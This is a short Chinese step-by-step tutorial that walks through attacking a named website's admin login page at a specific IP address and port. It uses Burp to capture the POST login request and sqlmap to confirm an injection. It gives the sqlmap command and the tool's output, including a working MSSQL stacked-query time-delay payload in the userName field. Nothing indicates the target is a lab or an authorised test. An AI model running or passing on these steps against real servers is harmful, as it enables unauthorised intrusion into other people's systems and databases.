
网站后台界面存在POST注入漏洞
环境准备
网站链接:http://124.220.81.65:88/Login/index
工具准备
这里用到两个工具,sqlmap和burp
工具下载
环境部署和配置去百度直接搜
第一步
打开burp,进行抓包,具体操作请看vcr
第二步
把抓到的内容全选复制,在工具里找到sqlmap文件夹,在文件夹里新建一个1.txt文件,把抓到的内容粘贴到1.txt内
第三步
按住键盘上的问键和r键,输入cmd打开命令行提示符,用cd命令进入到工具SQLmap文件夹内
输入一下python sqlmap.py -v命令,测试一下,sqlmap能不能使用
___
__H__
___ ___[)]_____ ___ ___ {1.7.12.3#dev}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced help
Press Enter to continue...显示上面这个就是可以使用
第四步
输入命令
python sqlmap.py -r 1.txt --random-agent这是会显示两次选择,输入y回车就行,后面也是一样
---
Parameter: userName (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: userName=1';WAITFOR DELAY '0:0:5'--&password=1
---这里可以知道该网站后台界面存在POST注入漏洞
22